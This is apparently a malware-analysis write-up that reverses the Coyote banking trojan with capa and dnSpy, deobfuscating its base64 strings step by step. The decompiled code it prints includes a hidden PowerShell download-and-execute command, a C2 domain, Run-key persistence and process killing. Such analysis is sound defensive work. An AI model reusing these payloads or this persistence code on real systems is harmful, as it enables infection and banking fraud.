Coyote Banking Trojan
# Coyote Banking Trojan :#
DIE :#
CAPA :#
┍━━━━━━━━━━━━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│ md5 │ 0e1cddca920547a1721fd6621c8c84cd │
│ sha1 │ 1268f12d671f23416ad5fc968cc54f11a8e1533f │
│ sha256 │ c2d25d9c88f68286f332ee1b0e989046c28bf5f10383990b5dcbb7d639ee21bc │
│ analysis │ static │
│ os │ any │
│ format │ pe │
│ arch │ i386 │
│ path │ C:/Users/DsM/Desktop/c2d25d9c88f68286f332ee1b0e989046c28bf5f10383990b5dcbb7d639ee21bc.exe │
┕━━━━━━━━━━━━━━━━━━━━━━━━┷━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙
┍━━━━━━━━━━━━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│ ATT&CK Tactic │ ATT&CK Technique │
┝━━━━━━━━━━━━━━━━━━━━━━━━┿━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┥
│ DEFENSE EVASION │ Deobfuscate/Decode Files or Information T1140 │
│ │ Modify Registry T1112 │
│ │ Obfuscated Files or Information T1027 │
│ │ Process Injection::Thread Execution Hijacking T1055.003 │
│ │ Reflective Code Loading T1620 │
│ │ Virtualization/Sandbox Evasion::System Checks T1497.001 │
├────────────────────────┼────────────────────────────────────────────────────────────────────────────────────┤
│ DISCOVERY │ Account Discovery T1087 │
│ │ File and Directory Discovery T1083 │
│ │ Process Discovery T1057 │
│ │ Query Registry T1012 │
│ │ System Information Discovery T1082 │
│ │ System Owner/User Discovery T1033 │
├────────────────────────┼────────────────────────────────────────────────────────────────────────────────────┤
│ EXECUTION │ Windows Management Instrumentation T1047 │
┕━━━━━━━━━━━━━━━━━━━━━━━━┷━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙
┍━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│ MBC Objective │ MBC Behavior │
┝━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┿━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┥
│ ANTI-BEHAVIORAL ANALYSIS │ Virtual Machine Detection [B0009] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ COMMAND AND CONTROL │ C2 Communication::Receive Data [B0030.002] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ COMMUNICATION │ HTTP Communication::Get Response [C0002.017] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ CRYPTOGRAPHY │ Generate Pseudo-random Sequence::Use API [C0021.003] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ DATA │ Decode Data::Base64 [C0053.001] │
│ │ Encode Data::Base64 [C0026.001] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ DEFENSE EVASION │ Obfuscated Files or Information::Encoding-Standard Algorithm [E1027.m02] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ DISCOVERY │ File and Directory Discovery [E1083] │
│ │ System Information Discovery [E1082] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ MEMORY │ Allocate Memory [C0007] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ OPERATING SYSTEM │ Environment Variable::Set Variable [C0034.001] │
│ │ Registry::Delete Registry Value [C0036.007] │
│ │ Registry::Query Registry Key [C0036.005] │
│ │ Registry::Query Registry Value [C0036.006] │
│ │ Registry::Set Registry Key [C0036.001] │
├─────────────────────────────┼───────────────────────────────────────────────────────────────────────────────┤
│ PROCESS │ Create Process [C0017] │
│ │ Create Thread [C0038] │
│ │ Suspend Thread [C0055] │
│ │ Terminate Process [C0018] │
┕━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┷━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙
┍━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│ Capability │ Namespace │
┝━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┿━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┥
│ reference anti-VM strings targeting Qemu │ anti-analysis/anti-vm/vm-detection │
│ receive data │ communication │
│ decode data using Base64 in .NET (15 matches) │ data-manipulation/encoding/base64 │
│ encode data using Base64 (3 matches) │ data-manipulation/encoding/base64 │
│ generate random numbers in .NET (2 matches) │ data-manipulation/prng │
│ find data using regex in .NET (2 matches) │ data-manipulation/regex │
│ contains PDB path │ executable/pe/pdb │
│ access .NET resource │ executable/resource │
│ set environment variable │ host-interaction/environment-variable │
│ get common file path │ host-interaction/file-system │
│ check if directory exists │ host-interaction/file-system/exists │
│ manipulate unmanaged memory in .NET │ host-interaction/memory │
│ get hostname (2 matches) │ host-interaction/os/hostname │
│ get OS version in .NET │ host-interaction/os/version │
│ create process on Windows │ host-interaction/process/create │
│ inject thread │ host-interaction/process/inject │
│ find process by PID │ host-interaction/process/list │
│ find process by name (2 matches) │ host-interaction/process/list │
│ terminate process (2 matches) │ host-interaction/process/terminate │
│ terminate process by name in .NET │ host-interaction/process/terminate │
│ query or enumerate registry key (2 matches) │ host-interaction/registry │
│ query or enumerate registry value │ host-interaction/registry │
│ set registry value │ host-interaction/registry/create │
│ delete registry value │ host-interaction/registry/delete │
│ get session user name │ host-interaction/session │
│ suspend thread (5 matches) │ host-interaction/thread/suspend │
│ access WMI data in .NET │ host-interaction/wmi │
│ spawn thread to RWX shellcode │ load-code/shellcode │
│ unmanaged call (5 matches) │ runtime │
│ compiled to the .NET platform │ runtime/dotnet │
┕━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┷━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙
output en json : ![[res.json]]
Visualizer : https://mandiant.github.io/capa/explorer/
dnSpy :#
Trying to understand the main function :#
Looking at the first part :
With cyberchef after reading the logic we have the b64 equal to : default_set
So we obtain :
byte[] bytes = Encoding.UTF8.GetBytes("default_set");
Encoding.UTF8.GetString(bytes);
Thread.Sleep(2000);
TVrzDkssV.JwpwwwUxNHBjDMpXYBb5();
TVrzDkssV.JwpwwwUxNHBjDMpXYBb5();
TVrzDkssV.JwpwwwUxNHBjDMpXYBb5();
if (!TVrzDkssV.HlxFzOV3h4oY5WN58nY4xjuKY())
{
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ALL_MODULE);
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("WEQyczZIV0s1SlJHVlhEMnM2SFdLNUpYRDJzNkhXSzVKbVlYWEQyczZIV0s1SlhEMnM2SFdLNUpWc2RYRDJzNkhXSzVKWEQyczZIV0s1SkE9PVhEMnM2SFdLNUo=")).Replace("XD2s6HWK5J", ""))), TVrzDkssV.ActionWebService.ALL_MODULE);
Thread.Sleep(5000);
Environment.Exit(0);
}
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ORANGE_MODULE);
TVrzDkssV.NxhZrOyy07kin52sVtYl();
TVrzDkssV.WvRPSTZ32cIA3Abt45a();
TVrzDkssV.XtnhAzHYZEQzzIhLlD8vGJGS();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
for (;;)
{
Thread.Sleep(500);
}
we have a sleep of 2 second
and we have a call to : TVrzDkssV.JwpwwwUxNHBjDMpXYBb5()
corresponding to :
try
{
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("V04welFZaExya1UyOVdOMHpRWWhMcmtXTjB6UVloTHJrbWRIV04welFZaExya1dOMHpRWWhMcmtkaGNXTjB6UVloTHJrV04welFZaExya21WY1dOMHpRWWhMcmtXTjB6UVloTHJrVFdsV04welFZaExya1dOMHpRWWhMcmtqY21XTjB6UVloTHJrV04welFZaExyazl6YldOMHpRWWhMcmtXTjB6UVloTHJrMlowV04welFZaExya1dOMHpRWWhMcmtYRmRXTjB6UVloTHJrV04welFZaExya3BibVdOMHpRWWhMcmtXTjB6UVloTHJrUnZkV04welFZaExya1dOMHpRWWhMcmszTmNXTjB6UVloTHJrV04welFZaExya1EzVldOMHpRWWhMcmtXTjB6UVloTHJreWNtV04welFZaExya1dOMHpRWWhMcmtWdWRXTjB6UVloTHJrV04welFZaExya0ZabFdOMHpRWWhMcmtXTjB6UVloTHJrY25OV04welFZaExya1dOMHpRWWhMcmtwYjJXTjB6UVloTHJrV04welFZaExyazVjVVdOMHpRWWhMcmtXTjB6UVloTHJrblZ1V04welFZaExyaw==")).Replace("WN0zQYhLrk", ""))), true))
{
if (registryKey != null)
{
foreach (string text in registryKey.GetValueNames())
{
object value = registryKey.GetValue(text);
if (((value != null) ? value.ToString() : null).Contains(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("Z1AyY29yd0xldGNHOWdQMmNvcndMZXRnUDJjb3J3TGV0M1pYZ1AyY29yd0xldGdQMmNvcndMZXRKemFnUDJjb3J3TGV0Z1AyY29yd0xldEdWc2dQMmNvcndMZXRnUDJjb3J3TGV0YkE9Z1AyY29yd0xldGdQMmNvcndMZXQ9Z1AyY29yd0xldA==")).Replace("gP2corwLet", "")))) || text.Contains(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("Znhld2pWUW56M2FtcGZ4ZXdqVlFuejNmeGV3alZRbnozbWVnZnhld2pWUW56M2Z4ZXdqVlFuejM9PWZ4ZXdqVlFuejM=")).Replace("fxewjVQnz3", "")))))
{
registryKey.DeleteValue(text);
break;
}
}
}
}
}
catch (Exception)
{
}
The first action open reg key (Run) :
after edit :
try
{
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true))
{
if (registryKey != null)
{
foreach (string text in registryKey.GetValueNames())
{
object value = registryKey.GetValue(text);
if (((value != null) ? value.ToString() : null).Contains(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("Z1AyY29yd0xldGNHOWdQMmNvcndMZXRnUDJjb3J3TGV0M1pYZ1AyY29yd0xldGdQMmNvcndMZXRKemFnUDJjb3J3TGV0Z1AyY29yd0xldEdWc2dQMmNvcndMZXRnUDJjb3J3TGV0YkE9Z1AyY29yd0xldGdQMmNvcndMZXQ9Z1AyY29yd0xldA==")).Replace("gP2corwLet", "")))) || text.Contains(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("Znhld2pWUW56M2FtcGZ4ZXdqVlFuejNmeGV3alZRbnozbWVnZnhld2pWUW56M2Z4ZXdqVlFuejM9PWZ4ZXdqVlFuejM=")).Replace("fxewjVQnz3", "")))))
{
registryKey.DeleteValue(text);
break;
}
}
}
}
}
with the same logic i edit the next b64 :
try
{
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true))
{
if (registryKey != null)
{
foreach (string text in registryKey.GetValueNames())
{
object value = registryKey.GetValue(text);
if (((value != null) ? value.ToString() : null).Contains("powershell") || text.Contains("jjfz"))
{
registryKey.DeleteValue(text);
break;
}
}
}
}
}
This function search in Run if there is a powershell entry or a jjfz entry it delete the entries.
returning to the main –>
Main (we edit the previous function name):
byte[] bytes = Encoding.UTF8.GetBytes("default_set");
Encoding.UTF8.GetString(bytes);
Thread.Sleep(2000);
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
if (!TVrzDkssV.HlxFzOV3h4oY5WN58nY4xjuKY())
{
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ALL_MODULE);
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("WEQyczZIV0s1SlJHVlhEMnM2SFdLNUpYRDJzNkhXSzVKbVlYWEQyczZIV0s1SlhEMnM2SFdLNUpWc2RYRDJzNkhXSzVKWEQyczZIV0s1SkE9PVhEMnM2SFdLNUo=")).Replace("XD2s6HWK5J", ""))), TVrzDkssV.ActionWebService.ALL_MODULE);
Thread.Sleep(5000);
Environment.Exit(0);
}
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ORANGE_MODULE);
TVrzDkssV.NxhZrOyy07kin52sVtYl();
TVrzDkssV.WvRPSTZ32cIA3Abt45a();
TVrzDkssV.XtnhAzHYZEQzzIhLlD8vGJGS();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
for (;;)
{
Thread.Sleep(500);
}
Now, we have a call to : TVrzDkssV.HlxFzOV3h4oY5WN58nY4xjuKY()
Go –>
With the same b64 logic it checks if Aplicativo Itau directory exist :
try
{
if (Directory.Exists("Aplicativo Itau"))
{
return true;
}
}
catch (Exception)
{
}
return false;
So now the main look like this :
private static void Main(string[] LagSaOKe0HLKqeARPZ80jSjw)
{
byte[] bytes = Encoding.UTF8.GetBytes("default_set");
Encoding.UTF8.GetString(bytes);
Thread.Sleep(2000);
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
TVrzDkssV.checkForPowershellOrJJFZKeyAndDeleteItIfFound();
if (!TVrzDkssV.checkIfDirectoryAplicativo_ItauExist())
{
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ALL_MODULE);
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("WEQyczZIV0s1SlJHVlhEMnM2SFdLNUpYRDJzNkhXSzVKbVlYWEQyczZIV0s1SlhEMnM2SFdLNUpWc2RYRDJzNkhXSzVKWEQyczZIV0s1SkE9PVhEMnM2SFdLNUo=")).Replace("XD2s6HWK5J", ""))), TVrzDkssV.ActionWebService.ALL_MODULE);
Thread.Sleep(5000);
Environment.Exit(0);
}
TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ORANGE_MODULE);
TVrzDkssV.NxhZrOyy07kin52sVtYl();
TVrzDkssV.WvRPSTZ32cIA3Abt45a();
TVrzDkssV.XtnhAzHYZEQzzIhLlD8vGJGS();
TVrzDkssV.EOPAdUd28W9OllK();
TVrzDkssV.EOPAdUd28W9OllK();
for (;;)
{
Thread.Sleep(500);
}
}
Next call line 11 to TVrzDkssV.EOPAdUd28W9OllK() if the folder do not exist :
we can see that we have the same logic for b64.
Edited after reverse :
try
{
foreach (Process process in Process.GetProcessesByName("powershell"))
{
process.Kill();
process.WaitForExit();
}
}
catch (Exception)
{
}
if some powershell process is running it kill them.
Go back to main :
Go to the call of TVrzDkssV.ViGZkNz5PhBDrexs(TVrzDkssV.ActionWebService.ALL_MODULE) :
We have a call to another function that we dont know. Go analyze it (call to : TVrzDkssV.ASliDwS8ZWVsYEAQG(WlTMsU6VlLcAsK6S))
A lot of obfuscation using b64. Im going to reverse it I deobfuscate first else because th parameter is equal to TVrzDkssV.ActionWebService.ALL_MODULE if we go back to the call at main.
So this else :
We start to see an url. But now we have a call to TVrzDkssV.WnXmWLyt2Bk4OOSC()
With the format of the concat in text2 we can say that this function get a domain name :
Reverse it :
private static string getDomainName()
{
byte[] b = Encoding.UTF8.GetBytes("afrl.animaliaoqisso.com");
return Encoding.UTF8.GetString(b);
}
Go back to the call we can edit :
next we have a call to TVrzDkssV.MomTnlEeimxKePAyv4FDhq(14)
i set the parameter manualy to 14
after little bit of editing :
private static string MomTnlEeimxKePAyv4FDhq(int n = 14)
{
byte[] b = Encoding.UTF8.GetBytes("abcdefghijklmnopqrstuvwxyz");
return new string((from s in Enumerable.Repeat<string>(Encoding.UTF8.GetString(b), n)
select s[TVrzDkssV.YTbNXcV5hoHYs980IbA.Next(s.Length)]).ToArray<char>());
}
we have here a call to TVrzDkssV.YTbNXcV5hoHYs980IbA.Next(s.Length)
It’s a random value :
Go back and continue reversing :
private static string ASliDwS8ZWVsYEAQG(TVrzDkssV.ActionWebService AllModuleParameters)
{
string text3;
try
{
string text = string.Empty;
string text2 = string.Empty;
if (AllModuleParameters != TVrzDkssV.ActionWebService.ORANGE_MODULE)
{
if (AllModuleParameters != TVrzDkssV.ActionWebService.ALL_MODULE)
{
if (AllModuleParameters == TVrzDkssV.ActionWebService.WPP_SENDER)
{
text2 = Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("OXVmbFJ6Nm0zOWFIUjl1ZmxSejZtMzk5dWZsUno2bTM5MGNIOXVmbFJ6Nm0zOTl1ZmxSejZtMzlNNkw5dWZsUno2bTM5OXVmbFJ6Nm0zOXk4PTl1ZmxSejZtMzk=")).Replace("9uflRz6m39", ""))) + TVrzDkssV.getDomainName() + "/" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(21);
text = Convert.ToBase64String(Encoding.UTF8.GetBytes(text2));
}
}
else
{
byte[] b = Encoding.UTF8.GetBytes("https://");
text2 = Encoding.UTF8.GetString(b) + "afrl.animaliaoqisso.com/" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(14);
text = Convert.ToBase64String(Encoding.UTF8.GetBytes(text2));
}
}
else
{
text2 = Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("OXVmbFJ6Nm0zOWFIUjl1ZmxSejZtMzk5dWZsUno2bTM5MGNIOXVmbFJ6Nm0zOTl1ZmxSejZtMzlNNkw5dWZsUno2bTM5OXVmbFJ6Nm0zOXk4PTl1ZmxSejZtMzk=")).Replace("9uflRz6m39", ""))) + TVrzDkssV.getDomainName() + "/" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(13);
text = Convert.ToBase64String(Encoding.UTF8.GetBytes(text2));
}
byte[] b1 = Encoding.UTF8.GetBytes('powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'replace\'));IEX $w.DownloadString($u)"');
byte[] b2 = Encoding.UTF8.GetBytes('\\$w');
byte[] b3 = Encoding.UTF8.GetBytes("replace");
text3 = Regex.Replace(Regex.Replace(Regex.Replace(Encoding.UTF8.GetString(b1), Encoding.UTF8.GetString(b2), "$" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(2)), Encoding.UTF8.GetString('\\$u'), "$" + TVrzDkssV.MomTnlEeimxKePAyv4FDhq(2)), Encoding.UTF8.GetString(b3), text);
}
catch (Exception)
{
text3 = string.Empty;
}
return text3;
}
So we detect a command :
powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'replace\'));IEX $w.DownloadString($u)"
Go back and we have this now :
So we have a powershell command that is added to a regkey with random name but starting with jjfz and with a powershell command as value. The command download and execute a payload.
Going back to main, we have a new part of the malware :
Now we try to understand the next call :
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(Convert.FromBase64String("WEQyczZIV0s1SlJHVlhEMnM2SFdLNUpYRDJzNkhXSzVKbVlYWEQyczZIV0s1SlhEMnM2SFdLNUpWc2RYRDJzNkhXSzVKWEQyczZIV0s1SkE9PVhEMnM2SFdLNUo=")).Replace("XD2s6HWK5J", ""))), TVrzDkssV.ActionWebService.ALL_MODULE);
Reversing the b64 of the call :
byte[] b = Encoding.UTF8.GetBytes("Default");
TVrzDkssV.RAjKqBOvBj3rMwI(Encoding.UTF8.GetString(b), TVrzDkssV.ActionWebService.ALL_MODULE);
Autres Aventures | Other Adventures